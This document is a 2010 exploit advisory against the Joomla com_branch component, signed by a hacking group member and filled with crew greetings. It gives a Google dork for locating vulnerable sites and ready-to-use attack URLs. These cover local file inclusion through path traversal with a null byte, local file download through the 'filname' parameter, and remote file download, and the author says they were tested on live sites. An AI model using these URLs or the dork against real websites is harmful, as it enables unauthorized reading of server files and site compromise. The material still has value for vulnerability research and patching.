The Joomla Branch component suffers from local file inclusion and file download vulnerabilities.
d97aa396bbfb28b4fbe68d6be9e3ef8643985d2d4ea2a7af0861c9cd4cc510dc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Joomla Component com_branch Multiple Vulnerabilities
# Date: 7-11-2010
# Author: Th3 RDX
# Software Link: n/a
# Version: n/a
# Tested on: online Sites
# category: webapp/Joomla
# Code : n/a
# Google Dork : allinurl:"index.php?option=com_branch"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Br0wn Sug4r, Sid3^effects, L0rd CruSad3r,
Sonic , r0073r(inj3ct0r.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k, G00g!3 W@rr!0r,
str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
##############################################################################
%//
----- [ Founder ] -----
Th3 RDX
----- [ E - mail ] -----
th3rdx@gmail.com
%\\
##############################################################################
##############################################################################
%//
----- [Title] -----
Joomla Component com_branch Multiple Vulnerabilities
----- [ Vendor ] -----
n/a
%\\
##############################################################################
##############################################################################
%//
----- [ Bug (s) ] -----
----- [ Local File Inclusion ] -----
=> [ EXPLOIT ]
http://server/index.php?option=com_branch&view=branch&controller=[LFI]
=> [ Example/POC ]
http://server/index.php?option=com_branch&view=branch&controller=../../../CREDITS.php%00
----- [ Local File Download ] -----
=> [ EXPLOIT ]
http://server/index.php?option=com_branch&controller=branch&task=filedownload&filname=[FILE]
=> [ Example/POC ]
http://server/index.php?option=com_branch&controller=branch&task=filedownload&filname=abc.jpg
----- [ Remote File Download ] -----
=> [ EXPLOIT ]
http://server/index.php?option=com_branch&controller=branch&task=filedownload&filname=[FILE URL]
=> [ Example/POC ]
http://server/index.php?option=com_branch&controller=branch&task=filedownload&filname=http://server/file.ppt
%\\
##############################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anythning for INDIA | JAI-HIND | Maa Tujhe Salam
=> c0d3 for motherland, h4ck for motherland
==> i'm worst than a useless <==
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.
Bug discovered : 07 November 2010
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#